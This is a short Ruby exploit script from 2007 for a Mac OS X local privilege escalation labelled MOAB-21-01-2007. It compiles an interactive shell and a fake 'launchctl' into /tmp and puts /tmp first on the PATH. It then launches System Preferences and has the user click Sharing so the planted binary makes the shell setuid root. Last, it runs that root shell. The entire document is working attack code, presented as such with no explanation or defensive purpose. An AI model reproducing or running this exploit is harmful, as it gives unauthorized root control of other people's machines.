#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre # Lance M. Havok # All pwnage reserved. # # "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day. # SHELL_WRAP = 'int main() { system("/bin/sh -i"); return 0; }' SHELL_PLANT = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }' PREFS_BINPATH = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences' COMMAND_LINE = "echo '#{SHELL_WRAP}' > /tmp/t.c &&" + "cc -o /tmp/shX /tmp/t.c &&" + "echo '#{SHELL_PLANT}' > /tmp/t.c &&" + "cc -o /tmp/launchctl /tmp/t.c &&" + 'export PATH="/tmp/:$PATH" &&' + "#{PREFS_BINPATH} &" def escalate() system COMMAND_LINE puts "++ Click on Sharing and then click on Windows Sharing..." sleep 30 # make sure you have "time" system "/tmp/shX" end escalate()